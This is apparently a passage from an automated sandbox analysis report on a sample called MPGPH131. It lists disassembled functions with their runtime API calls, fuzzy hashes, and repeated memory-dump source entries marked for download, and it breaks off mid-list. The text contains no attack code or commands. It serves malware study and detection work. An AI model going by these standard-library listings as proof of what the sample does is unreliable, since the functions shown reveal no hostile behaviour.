                                  • Instruction ID: 553310b9b14041d713b3b1d060bd604b726ea019522e66b7e3f86c415581c3bd
                                  • Opcode Fuzzy Hash: d178783fe878e5421caec7947fa4b3d8c89c68801f08b1d6f517acc1e223d25d
                                  • Instruction Fuzzy Hash: F371E472F00206AADB24AB74CC46BAA77AEEF45700F14452DF905DB282EB70ED41C7A5
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 005DAEB3
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 005DAED5
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 005DAEF5
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 005DAF1F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 005DAF8D
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005DAFD9
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 005DAFF3
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 005DB088
                                  • std::_Facet_Register.LIBCPMT ref: 005DB095
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                  • String ID: bad locale name
                                  • API String ID: 3375549084-1405518554
                                  • Opcode ID: bef9261acfba66b5efe00cbb0f19e2dd582883317f0af8d298bcd07358f77110
                                  • Instruction ID: 95b217e7cb6ff3b8aa36c639a565b4aac22c5bcd11fd66564ef9f96481def414
                                  • Opcode Fuzzy Hash: bef9261acfba66b5efe00cbb0f19e2dd582883317f0af8d298bcd07358f77110
                                  • Instruction Fuzzy Hash: 4D618DB5D00205DFDB60DFA8D885BAEBFB6BF05310F18445AE804A7381E734E905CBA6
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 005737E9
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00573835
                                  • __Getctype.LIBCPMT ref: 0057384E
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0057386A
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 005738FF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                  • String ID: 0:W$bad locale name
                                  • API String ID: 1840309910-2737869779
                                  • Opcode ID: 9381c707c66c564f7b22c0fcbf03d88a6683722809032e7b28b59172383cee8e
                                  • Instruction ID: 92871af02441c2d2dcb8bca30dac6d47413c49ab72061fc45fe1b9bb92acdaf6
                                  • Opcode Fuzzy Hash: 9381c707c66c564f7b22c0fcbf03d88a6683722809032e7b28b59172383cee8e
                                  • Instruction Fuzzy Hash: E15150F1D012589BDF50DFA4D88579EFBB8AF14314F148169EC08AB341E775EA08DBA2
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 006508B7
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 006508BF
                                  • _ValidateLocalCookies.LIBCMT ref: 00650948
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00650973
                                  • _ValidateLocalCookies.LIBCMT ref: 006509C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: Cd$csm
                                  • API String ID: 1170836740-2886570576
                                  • Opcode ID: fc7b2e5c92e692e5d36ecfa574e4b256b5d0de93c623f04b588b1cd24641c742
                                  • Instruction ID: 7b0b1f0043ee3c45a0ca33f4b0a8e3872e780dcc7e02a6078445eb5bb2915b21
                                  • Opcode Fuzzy Hash: fc7b2e5c92e692e5d36ecfa574e4b256b5d0de93c623f04b588b1cd24641c742
                                  • Instruction Fuzzy Hash: 6341C634A00209ABEF10DF68C880AEE7BB7BF45325F149559EC189B356D731EA49CB91
                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 0064C086
                                  • GetCurrentThreadId.KERNEL32 ref: 0064C0A3
                                  • GetCurrentThreadId.KERNEL32 ref: 0064C0C4
                                  • GetCurrentThreadId.KERNEL32 ref: 0064C147
                                  • __Xtime_diff_to_millis2.LIBCPMT ref: 0064C15F
                                  • GetCurrentThreadId.KERNEL32 ref: 0064C18B
                                  • GetCurrentThreadId.KERNEL32 ref: 0064C1D1
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentThread$Xtime_diff_to_millis2
                                  • String ID:
                                  • API String ID: 1280559528-0
                                  • Opcode ID: 749ca56055c60945bda6b846443698de55d30dd82488773b17a6041d573482cd
                                  • Instruction ID: 0da9a2b0417093f916045043a3d97833515c8041a823d881dbaa521cc3f99ee0
                                  • Opcode Fuzzy Hash: 749ca56055c60945bda6b846443698de55d30dd82488773b17a6041d573482cd
                                  • Instruction Fuzzy Hash: AA515871901615CFCFA0DF24C8819A9B7B3BF48730B254459E80AAB352DB31ED81CBA4
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,00664C96,00572D8D,?,00000000,?,?,?,00664EC0,00000022,FlsSetValue,00680AD8,00680AE0,?), ref: 00664C48
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 3664257935-537541572
                                  • Opcode ID: 35c8655a8166cb63a219cefae939d00e1fb114dcd510450ff51136c9be641ad1
                                  • Instruction ID: 758a5118883403a8ea0d240257c9e92e5990e10afc84155d3e66986894dce034
                                  • Opcode Fuzzy Hash: 35c8655a8166cb63a219cefae939d00e1fb114dcd510450ff51136c9be641ad1
                                  • Instruction Fuzzy Hash: 48210671A02225ABDB25EB65EC44B9B376BEB42774F251114E916A73D1DF30EF00CAD0
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C7BA
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C825
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C842
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C881
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C8E0
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C903
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiStringWide
                                  • String ID:
                                  • API String ID: 2829165498-0
                                  • Opcode ID: 8f0f12a281b30cb0afd653d75a48bc34250a669173de77d46a0661e8bde9ce20
                                  • Instruction ID: 2d7c3b42b0261af375db9a79780b1dbe691f12a95fa84a2751ac9bb1b5ce83d9
                                  • Opcode Fuzzy Hash: 8f0f12a281b30cb0afd653d75a48bc34250a669173de77d46a0661e8bde9ce20
                                  • Instruction Fuzzy Hash: 8851B07290220ABFEF609FA4CC45FEB7BABEF44760F154529F914A6351DB318D508B90
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 005D9543
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 005D9566
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 005D9586
                                  • std::_Facet_Register.LIBCPMT ref: 005D95FB
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 005D9613
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 005D962B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 65c787b476747ab718782a2dd89a61d57f4a9bc7d45822146567b1edc279a298
                                  • Instruction ID: 640745403de66d693c2ed94f2d3ffdacf81087b1976a3c234d89e6f1447ee982
                                  • Opcode Fuzzy Hash: 65c787b476747ab718782a2dd89a61d57f4a9bc7d45822146567b1edc279a298
                                  • Instruction Fuzzy Hash: AC41DF71D002199FCB25EF58E840AAABBB5FF42320F14466AE9196B391D730EE05CBD1
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FAAA2064,?,?,00000000,0067ACB1,000000FF,?,0065CBBF,?,?,0065CB93,00000016), ref: 0065CC18
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0065CC2A
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,0067ACB1,000000FF,?,0065CBBF,?,?,0065CB93,00000016), ref: 0065CC4C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 3efd8c89a7c24518b42e7d73edfa174541974a6bc97351ee868d3e397a29dbf1
                                  • Instruction ID: cb542aab21bf1b005bd036e32ac635eeccd9c91589c15a5efa77df23def8888d
                                  • Opcode Fuzzy Hash: 3efd8c89a7c24518b42e7d73edfa174541974a6bc97351ee868d3e397a29dbf1
                                  • Instruction Fuzzy Hash: A501A231940619EFCB159B54DC05FEEBBFAFB44B32F008629F819A2290DB759A44CA90
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 0057A478
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0057A483
                                  • GetProcessHeap.KERNEL32(?,?), ref: 0057A490
                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00010000), ref: 0057A4A6
                                  • RtlAllocateHeap.NTDLL(?,00000000,00010000), ref: 0057A4DC
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Allocate$AddressHandleModuleProcProcess
                                  • String ID:
                                  • API String ID: 3330366720-0
                                  • Opcode ID: 80b8550d54cecd6cb2b04c3f5873e4b191f9fc60e2468660b57773ef8028d0f9
                                  • Instruction ID: 74c70e1e05b9f7882dd127e91a0d8a487676367ac59226a2e56006733d196021
                                  • Opcode Fuzzy Hash: 80b8550d54cecd6cb2b04c3f5873e4b191f9fc60e2468660b57773ef8028d0f9
                                  • Instruction Fuzzy Hash: 8A41E731A04348ABDB10DFE9EC88B9EBBB9EF89324F10416DE90CE7251D67159448BA5
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005760F2
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 0057617F
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00576248
                                  Strings
                                  • recursive_directory_iterator::operator++, xrefs: 005761CC
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy$___std_exception_copy
                                  • String ID: recursive_directory_iterator::operator++
                                  • API String ID: 1206660477-953255998
                                  • Opcode ID: 2b73455c5e14795d587cee27cc92188ce4cafdde59252b77546ebf66d903ad0a
                                  • Instruction ID: 94fb78dab9a06c4ea8486905a2b5b42bfd3881907d14ebba699ef4a96e3a9948
                                  • Opcode Fuzzy Hash: 2b73455c5e14795d587cee27cc92188ce4cafdde59252b77546ebf66d903ad0a
                                  • Instruction Fuzzy Hash: E0E115B09006059FDB28DF68D845B9EFBF9FF44310F10861EE45697781E774AA48CBA1
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005786DE
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005786ED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: at line $, column
                                  • API String ID: 4194217158-191570568
                                  • Opcode ID: 388e7977b9ae18869e6fc078aebbebeb935a0133428aed56804951e330c7aa44
                                  • Instruction ID: 6020f7aa3f7c89ccae9f9840e55fa33693aa118d5697cc9bf809f3051704ca38
                                  • Opcode Fuzzy Hash: 388e7977b9ae18869e6fc078aebbebeb935a0133428aed56804951e330c7aa44
                                  • Instruction Fuzzy Hash: D9613F71900204AFDB08CF68DC89BADBFB6FF54310F14821DE419A7782DB74AA849795
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E3946
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E395F
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E3A97
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E3AB0
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E3C16
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E3C2F
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E4479
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E4492
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
